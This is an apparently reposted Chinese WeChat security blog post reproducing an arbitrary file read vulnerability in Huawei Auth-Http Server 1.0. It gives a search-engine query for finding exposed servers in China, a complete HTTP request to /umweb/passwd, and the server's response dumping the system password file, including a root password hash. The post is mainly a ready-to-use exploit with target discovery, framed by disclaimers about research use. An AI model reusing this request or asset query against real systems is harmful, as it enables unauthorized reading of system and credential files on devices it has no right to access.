声明
该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
漏洞描述
华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。
资产收集
server="Huawei Auth-Http Server 1.0" && country="CN"
漏洞复现
构造请求包
GET /umweb/passwd HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1
返回包
HTTP/1.1 200 OKPragma: no-cacheCache-Control: no-storeConnection: closeServer: Huawei Auth-Http Server 1.0Content-Type: text/html; charset=utf-8X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 727root:6UZSjeWUui3JQ:0:0:root:/root:/bin/shdaemon:*:1:1:daemon:/usr/sbin:/bin/shbin:*:2:2:bin:/bin:/bin/shsys:*:3:3:sys:/dev:/bin/shsync:*:4:65534:sync:/bin:/bin/syncgames:*:5:60:games:/usr/games:/bin/shman:*:6:12:man:/var/cache/man:/bin/shlp:*:7:7:lp:/var/spool/lpd:/bin/shmail:*:8:8:mail:/var/mail:/bin/shnews:*:9:9:news:/var/spool/news:/bin/shuucp:*:10:10:uucp:/var/spool/uucp:/bin/shproxy:*:13:13:proxy:/bin:/bin/shwww-data:*:33:33:www-data:/var/www:/bin/shbackup:*:34:34:backup:/var/backups:/bin/shlist:*:38:38:Mailing List Manager:/var/list:/bin/shirc:*:39:39:ircd:/var/run/ircd:/bin/shgnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:*:65534:65534:nobody:/nonexistent:/bin/sh
原文始发于微信公众号(Devil安全):【漏洞复现】华为Auth-HTTP服务器任意文件读取漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论